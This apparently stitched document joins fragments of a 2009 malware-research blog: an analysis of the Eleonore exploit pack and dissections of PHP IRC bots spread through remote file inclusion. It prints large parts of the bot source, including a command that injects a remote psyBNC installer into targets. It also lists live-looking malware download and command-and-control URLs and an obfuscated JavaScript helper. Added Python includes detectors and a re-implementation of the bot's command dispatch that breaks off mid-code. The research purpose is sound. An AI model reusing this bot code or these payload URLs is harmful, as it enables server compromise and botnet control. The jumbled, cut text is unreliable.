fputs($fp,'PING 12886241614'. CRL);
$isi = file_get_contents($mytargetlog,FILE_TEXT);
$isi = nl2br($isi);
$isi = str_replace("\n","",$isi);
$isi = str_replace("\r","",$isi);
$targetlog = explode("
",$isi);
if ($com[5] == 'show') {
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ Daftar Target ('.count($targetlog).') ]'. CRL);
$msgdelay = 0;
foreach ($targetlog as $baris) {
$msgdelay++;
if($msgdelay >= 2) { sleep(3) ; $msgdelay = 0; }
if ($baris) { fputs($fp,'PRIVMSG '.$sendnick.' :'.$baris. CRL); }
}
fputs($fp,'PRIVMSG '.$sendnick.' : 12[ The End ]'. CRL);
}
else {
fputs($fp,'PRIVMSG '.$sendnick.' : 12Total Target 1['.count($targetlog).']'. CRL);
}
}

The log subcommand fetches the remote target log ($mytargetlog) and either sends it to the requesting nick (show) or reports how many targets it contains.

elseif ($com[3]==':!psy' && $auth["$dNick"]["status"]!="User") {
$testurl = str_pesan($com[3],$data);
$theurl = $testurl.$mypsyinstaller;
$isi = implode('', @file($theurl));
$posisi = strpos($isi,".fx");
$isi = substr($isi,$posisi);
if ($posisi === FALSE) {
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :4 Ga bisa install psyBNC!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' 1 Ga bisa install psyBNC!'.CRL); }
}
else {
fputs($fp,'PRIVMSG '.$dNick.' :1 installed on:14 '.$testurl.CRL);
fputs($fp,'PRIVMSG '.$dNick.' :12H1asil:14 '.$isi.CRL);
}
unset($isi);
}
}

The !psy command appends the psyBNC installer URL ($mypsyinstaller) to the target URL (a remote file inclusion against the target), fetches the result and looks for the marker ".fx" in it: if the marker is missing it reports that psyBNC could not be installed, otherwise it reports the install location and the output. Note that the check $auth["$dNick"]["status"]!="User" is also passed by nicks that are not in $auth at all, since their status is undefined.

elseif ($com[3]==':!scan') {
if ($com[4]=='add' && $com[5]) {
$msg = str_pesan($com[3].' '.$com[4],$data);
if (!in_array($msg,$scanlist)) {
$scanlist[] = $msg;
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :Seep..! 12 '.$msg.' ditambahkan!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' :Seep..! 12 '.$msg.' ditambahkan!'.CRL); }
}
else { fputs($fp,'NOTICE '.$dNick.' :12 '.$msg.' sudah ada!'.CRL); }
}
elseif ($com[4]=='del' && $com[5] && $auth["$dNick"]["status"]!="User") {
$msg = str_pesan($com[3].' '.$com[4],$data);
if (in_array($msg,$scanlist)) {
$daftar = join(' ',$scanlist);
unset($scanlist);
$daftar = str_replace($msg,'',$daftar);
$scanlist = explode(' ',$daftar);
if ($chan) { fputs($fp,'PRIVMSG '.$chan.' :OKey..!12 '.$msg.' dihapus!'.CRL); }
else { fputs($fp,'PRIVMSG '.$dNick.' :OKey..!12 '.$msg.' dihapus!'.CRL); }
}
unset($daftar);
}

!scan add appends a new scan trigger to $scanlist, with no authorization check at all; !scan del removes one and is gated on the status not being "User", a check that, as for !psy, an unknown nick with no status also passes.

Tuesday, 3 November 2009

[Crimeware] Researches about Eleonore Exploit Pack

Hi,

Today we will see how the Eleonore Exploit Pack works, directly from an infected website.

Essentially the Eleonore Exploit Pack is a collection of exploits and statistics collectors; this is the 'marketing' presentation of the pack:

*---------------------------------------------------------------*
Hello!
I present new actual russian exploits pack "Eleonore Exp v1.2"


Exploits on pack:
> MDAC
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

installs on traffic:
> on usa: 5-15%
> on mix: 10-25%
* Piercing indicates approximate, may vary and depends directly on the type and quality of traffic.


Price:
> Eleonore Exp Pack 1.2 = 700$
> Cleans cryptor on AV = 50$
> Rebuild on another domain = 50$
* PACK is binding on domain.
> Eleonore Exp Pack 1.2 with not binding domain(free on domain) = 1500$

*---------------------------------------------------------------*

Here you can read a discussion in which the author of the pack takes part:

http://www.opensc.ws/trojan-malware-releases/7443-eleonore-exp-new-actual-russian-exploits-pack.html

Three versions of the Eleonore Exploit Pack exist:
  1. Eleonore Exp v1.1
  2. Eleonore Exp v1.2
  3. Eleonore Exp v1.3B
The latest version (1.3B) adds new exploits, connectivity improvements and optimizations to the collection of statistics about the zombies (country, browser, OS, etc.).

By watching the traffic to that URL we can immediately extract a list of the most interesting links:

  1. http://*****.cn/sv/x.x
  2. http://*****.cn/sv/Client2.jar
  3. http://*****.cn/sv/pdf.php
  4. http://*****.cn/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4
  5. http://*****.cn/sv/load.php?spl=ActiveX_pack
  6. http://*****.cn/sv/stat.php
As you can see everything is contained in the /sv/ directory. Now let's check, for example, the load.php link:
accessing it downloads an executable called load.exe with

MD5: 50AC484D4775B783D70D87A21BBFAA36

Submitted to the various online AV scanners it came back clean. The PE has 4 sections (name, virtual address, virtual size, raw size, entropy, MD5):

.text 0x1000 0x48B0 0x4A00 7.39 5135f06000479a5b2e378caa2c4fd8a9
.rdata 0x6000 0x26D 0x400 3.07 8492531c69aab5794ba61207842ba4d6
.data 0x7000 0x2AA7 0x2C00 6.71 092b8e63ebe1ac83d571aba964e041d1
.rsrc 0xA000 0x46C 0x600 4.07 aceb78467d14ed7c7023da0ff5fc59ef

The entropy of .text (7.39) is consistent with packed or encrypted code.

and this is the Import Table list

kernel32.dll: SetFilePointer, HeapUnlock, VerifyVersionInfoA, GetLongPathNameA, _lclose, GetEnvironmentStringsW, HeapDestroy, GetLocaleInfoW, HeapAlloc, GetFileType, HeapCreate, WaitForSingleObjectEx, lstrcmpiA, SetCalendarInfoA, HeapFree, lstrcatW, ExitProcess, SetLastError, VirtualProtect, GetFullPathNameA, SetUnhandledExceptionFilter, lstrcpyW, GlobalFindAtomA

The application has 3 hidden (packing) layers.

This is a quick list of operations performed by load.exe

First Thread
71a370df RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)
71a37cc4 RegOpenKeyExA (Protocol_Catalog9)
71a3737e RegOpenKeyExA (0000000B)
71a3724d RegOpenKeyExA (Catalog_Entries)

The application reads the Winsock2 parameters (protocol catalog).

Second Thread
401129 CreateFileA(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp)
401561 LoadLibraryA(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp)=602c0000

Creates 2A.tmp in the temp directory and loads it with LoadLibraryA (it is a DLL).

602c4955 LoadLibraryA(kernel32.dll)=7c800000
602c4cbb LoadLibraryA(ntdll.dll)=7c910000
602c4d13 LoadLibraryA(ws2_32.dll)=71a30000
602c4e52 LoadLibraryA(advapi32.dll)=77f40000
76d2563d GetVersionExA()
76d258ef CreateFileA(\\.\Ip)

Opens the \\.\Ip device.

76d25bc2 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage)
76d25bdc RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\)
76d25bf3 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces)
76d25c0d RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters)

Opens the main networking registry keys (Tcpip, NetBT).

602c4f3a LoadLibraryA(iphlpapi.dll)=76d20000
5b19ef89 GetCurrentProcessId()=2436
5b18b1ba IsDebuggerPresent()
746b26aa GetVersionExA()
746b30a7 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\Compatibility\load.exe)
746b30a7 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\SystemShared\)

Checks for the presence of a debugger and opens the CTF Compatibility and SystemShared keys for its own image name.


746b245b CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)
746b245b CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-854245398-1229272821-725345543-1003)

Creates a series of CTF mutexes, presumably linked to the keyboard (keystroke logging)

746b30a7 RegOpenKeyExA (HKCU\Keyboard Layout\Toggle)
746b260a RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\CTF\)

so it may act as a keylogger. One caveat: the CTF.*.MutexDefault mutexes and the HKLM\SOFTWARE\Microsoft\CTF keys are also created and read by the Windows Text Services Framework (msctf.dll) in ordinary GUI processes, so on their own they are weak evidence; the keylogging hypothesis needs confirming in the code of helh.oso.

775220b0 LoadLibraryA(CLBCATQ.DLL)=76f90000
775228a1 LoadLibraryA(CLBCATQ.DLL)=76f90000

CLBCATQ.DLL is the COM+ configuration catalog DLL.

602c214f CreateProcessA((null),svchost.exe,0,(null))
7c81628b WaitForSingleObject(6d8,64)
77b14cd7 LoadLibraryA(VERSION.dll)=77bd0000
7c818e2c LoadLibraryA(advapi32.dll)=77f40000
10001e25 LoadLibraryA(psapi.dll)=76bb0000
10001e66 GetCurrentProcessId()=2436
76bb183b ReadProcessMemory(h=6e0)
76bb185a ReadProcessMemory(h=6e0)
76bb1878 ReadProcessMemory(h=6e0)
76bb17bb ReadProcessMemory(h=6e0)
WriteProcessMemory=1 BufLen=23 BytesWritten:23

This means that load.exe writes into svchost.exe (process injection), presumably to establish a channel
with the malicious sites from a trusted-looking process.

602c15c7 Copy(C:\DOCUME~1\evilcry\IMPOST~1\Temp\2A.tmp->C:\WINDOWS\system32\helh.oso)
7c82fa88 WriteFile(h=700)

The content of 2A.tmp is copied to \WINDOWS\system32\helh.oso.

602c298f RegOpenKeyExA (HKCR\idid)
602c2d4d RegCreateKeyExA (HKCR\idid,(null))
602c2d92 RegSetValueExA (url0)
602c2c3b RegOpenKeyExA (HKCR\idid)
76d22bd0 RegOpenKeyExA (HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D1D028D3-3E11-436A-8FD8-8A4993A911A5})
602c267d gethostbyname(602c8760)

The injection into svchost.exe is done and the application attempts to reach some hosts, which a
network sniff reveals:
  • papaanarhia.cn
  • papaanarhia.cn.localdomain

Now let's reverse helh.oso.

Disassembling it reveals a DLL with the following exports:
  • DllMain
  • DllEntryPoint
  • DllEntryPoint
  • dxdll
  • vtfeb
  • ruagpi
  • vlecvja
interesting strings:

libgcj_s.dll
Jv_RegisterClasses
'GET /%s HTTP/1.1'
'User-Agent: Opera\9.63',
'Host: %s',0Dh,0Ah

so load.exe acts as a backdoor trojan that runs in the background and allows remote access to the compromised system. It is interesting to note that the domain used is the same as that of
  • Backdoor.Win32.Bredavi.aig
  • Trojan.Win32.Sasfis.qri
helh.oso downloads and/or requests other files from the Internet, from the following URLs:
  • http://bookheads.cn/dib-file.exe
  • http://papaanarhia.cn/myl/bb.php?id=199826733&v=200&tm=2&b=01
  • http://papaanarhia.cn/myl/bb.php?id=199826733&v=200&tm=2&b=01&tid=3&r=1
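As an added example (not part of the post), here is Python detection logic that tags proxy-log requests matching the Eleonore infection chain described above (the /sv/ landing URL with its spl/br/vers/s parameters, the payload URLs under /sv/) and the check-in that helh.oso makes to bb.php, together with the malformed 'Opera\9.63' User-Agent from its strings. Hostnames are deliberately not matched, since the pack is sold rebuilt on new domains; the log lines and the hostnames in them are constructed.

```python
"""Added example, not part of the post: tag requests in a proxy log that match
the Eleonore /sv/ URL structure or the helh.oso (Bredavi) check-in to bb.php.
The log lines and hostnames below are constructed for the example."""

import re
from urllib.parse import urlsplit, parse_qs

HEX32 = re.compile(r"[0-9a-f]{32}$")                                   # the s= parameter
PAYLOAD = re.compile(r"/sv/(?:load\.php|pdf\.php|Client2\.jar|x\.x)$")  # files seen under /sv/


def classify(url, user_agent=""):
    """Return the list of tags that apply to one request (empty if it looks benign)."""
    tags = []
    u = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(u.query).items()}
    # landing page: /sv/?spl=<exploit id>&br=<browser>&vers=<version>&s=<32 hex>
    if u.path.endswith("/sv/") and {"spl", "br", "vers", "s"} <= set(q) and HEX32.match(q["s"]):
        tags.append("eleonore-landing")
    # exploit / payload fetches: load.php?spl=..., pdf.php, Client2.jar, x.x
    if PAYLOAD.search(u.path):
        tags.append("eleonore-payload")
    # helh.oso check-in: /myl/bb.php?id=...&v=...&tm=...&b=... (optionally &tid=...&r=...)
    if u.path.endswith("/bb.php") and {"id", "v", "tm", "b"} <= set(q):
        tags.append("bredavi-checkin")
    # the DLL's User-Agent string uses a backslash where Opera uses a slash
    if re.fullmatch(r"Opera\\\d+\.\d+", user_agent):
        tags.append("malformed-opera-ua")
    return tags


# Constructed proxy log: client<TAB>method<TAB>url<TAB>user-agent
LOG = """\
10.0.0.5\tGET\thttp://pack.example/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
10.0.0.5\tGET\thttp://pack.example/sv/load.php?spl=ActiveX_pack\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
10.0.0.5\tGET\thttp://pack.example/sv/pdf.php\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
10.0.0.5\tGET\thttp://c2.example/myl/bb.php?id=199826733&v=200&tm=2&b=01\tOpera\\9.63
10.0.0.7\tGET\thttp://www.example.org/index.php?id=5\tMozilla/5.0
"""


def scan_log(text):
    """Yield (line number, client, tags) for every line that gets at least one tag."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        client, _method, url, ua = line.split("\t")
        tags = classify(url, ua)
        if tags:
            hits.append((n, client, tags))
    return hits


if __name__ == "__main__":
    for n, client, tags in scan_log(LOG):
        print(f"line {n} {client}: {', '.join(tags)}")
```

The landing hit on its own is a client that reached the pack; a landing hit followed by a payload hit from the same client, or any bb.php check-in, is a client that should be pulled for the helh.oso / svchost.exe injection described above.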
Now let's check /sv/x.x, which contains a small deobfuscation helper:

function fokusp(Lomka,kolma)
{
return eval('Lom'+'ka.rep'+'lace('+'/KOHb55544 3233/g'+',kolma)');
}

The concatenated fragments evaluate to Lomka.replace(/KOHb55544 3233/g, kolma): every occurrence of the marker "KOHb55544 3233" in the obfuscated payload (Lomka) is replaced with the key (kolma), and splitting the string literals keeps the word "replace" out of the page source so that naive signature matching misses it.

/sv/stat.php

is the statistics login page, where the operator is asked for username and password.

/sv/pdf.php

serves GDGCavPJwlrd.pdf, a malicious PDF.

See you at the next post.. :)

Sunday, 1 November 2009

[Malware] BDS/PHP.Agent.DW.8 Dissection

Hi,

Today again an RFI infection; the target to dissect is BDS/PHP.Agent.DW.8, which works
as an IRC bot.

/***********************************
/* Guard Cakep Powered By dendy *
/* Female Character *
/* Copyleft February 2009 *
/* #pangkul @ irc.allnetwork.org *
/* vj_dendy@yahoo.co.id *
/***********************************
/*
/* Attention:
/* Join only one bot per channel, to avoid the bots greeting each other.
/*
/* Basic commands:
/* auth - For authorization
/* !join [#channel] - Join a channel
/* !part [#channel] - Part a channel
/* !msg - Send a message to a channel or a nick
/* !botnick [nick] [password] - Change the bot's nick
/* !jump [server] - Change the bot's server
/* !help - View the command list
/* !ngomong - Allow the bot to talk in all channels
/* !diam - Forbid the bot from talking in all channels
*/

This bot supports the classic IRC-related commands plus !jump, !ngomong and !diam, which we
will analyze.

function hajar() {

$channels = '#pangkul'; //Separate channels with spaces
$admin = 'VJ_dEnDy';
$bot_password = 'jembod'; //Password for bot auth
$ngomong = TRUE; //TRUE, talk. FALSE, stay quiet.
$autowelcome = TRUE; //TRUE, AutoWelcome on. FALSE, AutoWelcome off.
$versi = "v1.7";
$showresponse = 0; //1, show the responses from the IRC server
$localtest = 0; //1, test on localhost. 0, connect to the IRC server

This reveals everything needed for a digital investigation: we know the channel, the admin nick and
the passwords.

//Bot nicks
$nicklist = array("VJ1","VJ2","VJ3","VJ4","VJ5",
"VJ6","VJ7","VJ8","VJ9","VJ10","VJ11");
$identify = "230283"; //Nick (NickServ) password
//Bot ident
$identlist = array("dendy",);
//Bot realname
$namabot = array("d3ndy",);
//Bot "asl"
$aslbot = array("dari chanel pangkul",);
//Quit messages
$quitmsglist = array("mau ngintip anak tetangga mandi :D","Bye All..");

Other identity information for the bot's nick:

$namaku = $namabot[rand(0,count($namabot) - 1)];
$aslku = $aslbot[rand(0,count($aslbot) - 1)];

The bot's realname and "asl" are picked at random from those lists.

And here an interesting item: the array of IRC servers the bot can connect to

if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"irc.cbn.net.id",
"irc.allnetwork.org",
"irc.elnus.net.id",
"irc.velo.net.id",
"irc.indika.net.id",
"irc.indo.net.id",
"irc.circleone.net.id",
"irc.ads.net.id",
"irc.jmn.net.id",
"202.146.180.46",
"irc.big.net.id",
"irc.sbp.net.id",
);
}
$port = "6667";
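Both this bot and PHPSpyScanBot above keep their command-and-control parameters as plain assignments inside hajar(): the IRC servers, port, channels, admin nick, bot and NickServ passwords, the remote URLs, plus the base64-encoded JOIN. As an added example (written for this page, not the bots' code), the Python below pulls those indicators out of a source file with a few regular expressions; it runs against a constructed excerpt laid out like the two samples, with placeholder values (the base64 blob is the one both samples send).

```python
"""Added example, not the bots' code: extract IRC C2 indicators from a
FeeLCoMz-style PHP bot source. The excerpt below is constructed in the layout
of the two samples on this page, with placeholder values."""

import base64
import json
import re

SAMPLE_PHP = r'''
function hajar() {
$channels = '#chan1 #chan2'; //Pisahkan tiap channel dengan spasi
$admin = 'boss';
$bot_password = 'secret'; //Password untuk auth bot
$identify = "nspass"; //Password Nick Bot
$mylogger = 'http://c2.example/cyberz/logs/logger.php?';
$myshelluploader = 'http://c2.example/cyberz/uploadshell.txt?';
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"irc.example.invalid",
"192.0.2.10",
);
}
$port = "6667";
fputs($fp, base64_decode("Sk9JTiAjRmVlTENvTXo=") . CRL);
$admin = strtolower($admin);
}
'''


def php_scalar(src, name):
    """Value of the first `$name = '...';` (single or double quoted, trailing comment allowed)."""
    m = re.search(r"\$" + re.escape(name) + r"\s*=\s*(['\"])(.*?)\1\s*;", src)
    return m.group(2) if m else None


def php_string_array(src, name):
    """All string literals from every `$name = array(...);` in the file."""
    out = []
    for body in re.findall(r"\$" + re.escape(name) + r"\s*=\s*array\((.*?)\)\s*;", src, re.S):
        out.extend(re.findall(r"['\"]([^'\"]*)['\"]", body))
    return out


def decoded_base64_calls(src):
    """Decode every literal passed to base64_decode(); the bots hide their JOIN this way."""
    out = []
    for blob in re.findall(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", src):
        try:
            out.append(base64.b64decode("".join(blob.split())).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out


def extract_iocs(src):
    channels = (php_scalar(src, "channels") or "").split()
    decoded = decoded_base64_calls(src)
    for text in decoded:                       # hidden JOINs are channels too
        if text.startswith("JOIN "):
            channels.extend(text[5:].split(","))
    return {
        "irc_servers": [h for h in php_string_array(src, "remotehost2") if h != "localhost"],
        "port": php_scalar(src, "port"),
        "channels": sorted(set(channels)),
        "admin_nick": php_scalar(src, "admin"),
        "bot_password": php_scalar(src, "bot_password"),
        "nickserv_password": php_scalar(src, "identify"),
        "urls": sorted(set(re.findall(r"https?://[^\s'\"]+", src))),
        "decoded_base64": decoded,
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_PHP), indent=2))
```

The localhost entry from the $localtest branch is dropped, and the trailing "?" on the URLs is kept on purpose: it is the remote-file-inclusion form the bots use when appending these URLs to a target.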

Next come the welcome messages and the mood list, which I'll skip since they are of no use for
our purposes. Amusingly, there is a list of bad words:

//Special Words
$badwordlist = array("jancuk","babi","puki","s0so","s0s0","sos0","s0h","sosoh","k3h","peller","peler","p4lak","p4l4k","pal4k","#","join di","tae","p3p3k","p3pek","pep3k","m3k","ngengek","p0k","embot","asyu","setan","ancrit","coex","coek","jancox","mencret","cox","jancok","palak","memek","patek","pepek","kontol","anjrit","anjink",
"fuck","entot","ngentot","taek","kelamin","ngesex","ml ","pokeh","anjing",
"poke","tempek","vagina","penis","luji","kodo",);
$pujianlist = array("cantik","baik","baek","cakep","ramah","pengertian","hebat",
"bagus","indah","jujur");
$cacianlist = array("bego","jelek","jelex","gendeng","edan","gilo","gila",
"sinting","dudul","dodol","jahat","goblok","geblek","sialan"," bau","stres");

//Flood Protection Setting
$maxkar = 200; //Maximum characters in the channel

No more than 200 characters per channel message are allowed.

$helptext = array(
' 3,9? 0,1 ? ¬den¬ dy #pangkul '.$versi.' Help ? 3,9? ',
"-",
" 12auth - Log in to the bot",
" 12deauth - Log out from the bot",
" 12pass - Set the bot password",
" 12chgpass - Change the bot password",
" 12adduser - Add a bot master/user",
" 12deluser - Remove a bot master/user",
" 12`auth - Your status in the channel (Channel)",
" 12!auth - Your authorization status",
" 12!act - Bot action (Channel)",
" 12!slap - Slap a nick (Channel)",
" 12!msg - Send a message",
" 12!notice - Send a notice",
" 12!ctcp - Request CTCP",
" 12!ping - Ask the bot to reply with pong (Channel)",
" 12!info - View bot info (Admin)",
" 12!up - Ask the bot to take @ in the channel (Channel)",
" 12!down - Ask the bot to drop @ in the channel (Channel)",
" 12!cycle - Hop (part and rejoin) the channel (Channel) (Admin/Master)",
" 12!part [channel] [reason] - Part from a channel (Admin)",
" 12!join - Join a channel (Admin/Master)",
" 12!botnick - Change nick (Admin/master)",
" 12!k - Kick a nick (Channel)",
" 12!kb - Kick-ban a nick (Channel)",
" 12!changenick - Change nick to an internal nick",
" 12!op [nick2] [nick3] - Op (Channel)",
" 12!deop [nick2] [nick3] - Deop (Channel)",
" 12!v [nick2] [nick3] - Voice (Channel)",
" 12!dv [nick2] [nick3] - Devoice (Channel)",
" 12!away [reason] - Set the nick away",
" 12!mode - Change mode (Channel)",
" 12!nickmode - Set the user mode",
" 12!userlist - View the user list",
" 12!quit [message] - Quit from IRC (Admin)",
" 12!vhost [vhost] - Change the vhost",
" 12!jump [server] - Change the bot's server",
" 12!fullname [name] - Change the bot's fullname",
" 12!topic - Change the channel topic (Channel)",
" 12!help - View help (Query)",
" 12!ngomong - Enable auto response",
" 12!diam - Disable auto response",
" 12!wb - Add a welcome message for a given nick",
"-",
' 3,9? 0,1 ? By VJ_dEnDy - #pangkul @ irc.allnetwork.org ? 3,9? ',
);

This is the help text, and it is obviously a good way to learn the supported commands.

$nick = $nicklist[rand(0,count($nicklist) - 1)];
$realname = $namaku;
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
$admin = strtolower($admin);
$auth = array(
$admin => array(
"name" => $admin,
"pass" => $bot_password,
"auth" => 1,
"status" => "Admin"
)
);

This picks a random nick from the nick list and a random server from the remote host list, and builds
the authentication table: the admin entry is composed of name, pass, auth and a status set to 'Admin'.

$username = $identlist[rand(0,count($identlist) - 1)];
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);

A random ident is chosen and the channel list is split.

do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 60);
//If the connection fails
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp + 1;
hajar();
}
else {
echo ">Can't connect to $remotehost!";
$keluar = 1;
exit;
}
}

Connects to the remote host; on failure it re-enters hajar() recursively, up to 200 times, before giving up.

$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = "
";

Sends the NICK/USER registration over the socket.

while (!feof($fp)) {
$response .= fgets($fp, 1024);
if ($showresponse == 1) { echo $response."
"; }
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$offsetB = strpos($data, ' :');
$offsetC = strpos($data, '!');
$dFrom = substr($data,1,$offsetA-1);
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);

This reads the server's lines and splits each one into the prefix (dFrom/dNick), the command with its parameters (dCommand) and the trailing text (iText); the following piece handles the server's numeric replies: on 004 (welcome) it identifies to NickServ, joins the hidden #FeeLCoMz channel (the same base64-encoded JOIN seen in PHPSpyScanBot), greets the admin and joins the configured channels; 432/433 handle a bad or already used nick, and 465 an autokill.

if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, base64_decode('Sk9JTiAjRmVlTENvTXo=') . CRL);
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :Hai Boss!' . CRL);
/*** Join Default Channel ***/
foreach ($channel as $v) { fputs($fp, 'JOIN ' .$v . CRL); }
}
elseif (substr($dCommand,0,3)=='432'){
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
//Nickname is already in use
elseif (substr($dCommand,0,3)=='433'){
$nick = $nicklist[rand(0,count($nicklist) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='465'){
echo "
Authentication required! This bot has been autokilled.";
$akill = 2;
}
if (substr_count($dNick,'.allnetwork.org') > 0) {
if (substr_count($iText,"*** Banned") > 0) {
echo "BANNED!";
$keluar = 1;
exit;
}
}

/*** AI PHP BOT SCRIPT VJ_dEnDy ***/
$dcom = explode(" ", $dCommand);
if ($dcom[0]=='JOIN') {
/*** Auto Welcome by VJ_dEnDy ***/
$ada = FALSE;
if ($autowelcome) {
$jchan = ltrim($iText,":");
foreach ($nickwb as $v){
$trtext = strtolower($v[0]);
if (substr_count(strtolower($dNick),$trtext) > 0) {
sleep(3);
fputs($fp,'PRIVMSG '.$jchan.' :'.$v[1]. CRL);
$ada = TRUE;
}
}
}
if (($autowelcome) && ($dNick != $nick)) {
if(!$ada) {
$jchan = ltrim($iText,":");
$webe = $wbmsg[rand(0,count($wbmsg) - 1)];
$webe = str_replace("",$dNick,$webe);
$webe = str_replace("",$jchan,$webe);
$webe = str_replace("#","",$webe);
sleep(5);
fputs($fp,'PRIVMSG '.$jchan.' :'.$webe . CRL);
}
}
}
if ($dcom[0]=='PRIVMSG') {
/*** Auto Response by VJ_dEnDy ***/
if ($ngomong) {
$teman = FALSE;
if (in_array($dNick,$nicklist)) {
$teman = TRUE;
}

Enables auto-response on private messages; the bot also handles the following events:

  1. Good reply
  2. Bad reply -> kick
  3. Protection against flood
Next comes the command parsing function. Some interesting commands:

fputs($fp,'NOTICE '.$dNick.' :'.chr(1).base64_decode("VkVSU0lPTiBGZWVMQ29NeiBBSSBQSFBCb3QgU2NyaXB0IEJ5IFJvTno=").chr(1) . CRL);

Decoded: VERSION FeeLCoMz AI PHPBot Script By RoNz. This is the bot's CTCP VERSION reply (wrapped in chr(1)), which makes it a convenient fingerprint for the bot on the IRC side.

elseif ($com[3]==':!info') {
if ($auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bip = $_SERVER['SERVER_ADDR'];
$bphp = $_SERVER['PHP_SELF'];
$bruri = $_SERVER['REQUEST_URI'];
$brip = $_SERVER['REMOTE_ADDR'];
$brport = $_SERVER['REMOTE_PORT'];
fputs($fp,"NOTICE $dNick :Host: $bhost | Script: $bphp | Referer: $bruri | IP: $bip | Your IP: $brip Port:$brport" . CRL);

This is the reply when an Admin sends !info.

And here two more Admin-only commands, !vhost and !jump; !jump without an argument selects a random
remote host:

elseif ($com[3]==':!vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':!jump' && $auth["$dNick"]["status"]=="Admin") {
if (empty($com[4])) {
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
}

At the moment this bot has infected a large number of servers..
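As an added example (not the bot's code), the Python below re-implements the line parsing and reply handling used by this bot and by PHPSpyScanBot above: the substr/strpos split into dFrom/dNick, dCommand and iText, the 004/433 handling, and a command dispatch that indexes the raw line split on spaces, which is what the bots' $com[3]/$com[4] comparisons (':!target', 'total') imply. Nicks, passwords and channels are placeholders; where the PHP picks a replacement nick at random this picks the next one, and the FALSE cases of strpos are simplified.

```python
"""Added example, not the bot's code: a model of the FeeLCoMz-style bots'
line parsing, numeric-reply handling and command dispatch, with the same
nick-keyed authorization checks the PHP uses. All values are placeholders."""

import base64

JOIN_B64 = "Sk9JTiAjRmVlTENvTXo="   # the blob both bots decode and send after the 004 welcome


class FeeLCoMzBot:
    def __init__(self, nicklist, identify, admin, bot_password, channels):
        self.nicklist = list(nicklist)
        self.nick = self.nicklist[0]
        self.identify = identify               # $identify: NickServ password
        self.admin = admin.lower()             # $admin = strtolower($admin)
        self.channels = list(channels)
        # $auth starts with the admin only; every later check in the PHP reads
        # $auth[$dNick]["status"], i.e. authorization is keyed on the sender's nick
        self.auth = {self.admin: {"pass": bot_password, "auth": 1, "status": "Admin"}}
        self.targetlist = []
        self.scanlist = ["http", "ftp"]        # PHPSpyScanBot's default $scanlist

    @staticmethod
    def parse(line):
        """Field extraction as in the PHP substr/strpos code (strpos FALSE cases simplified)."""
        if not line.startswith(":"):
            return None
        off_a, off_b, off_c = line.find(" "), line.find(" :"), line.find("!")
        d_from = line[1:off_a]
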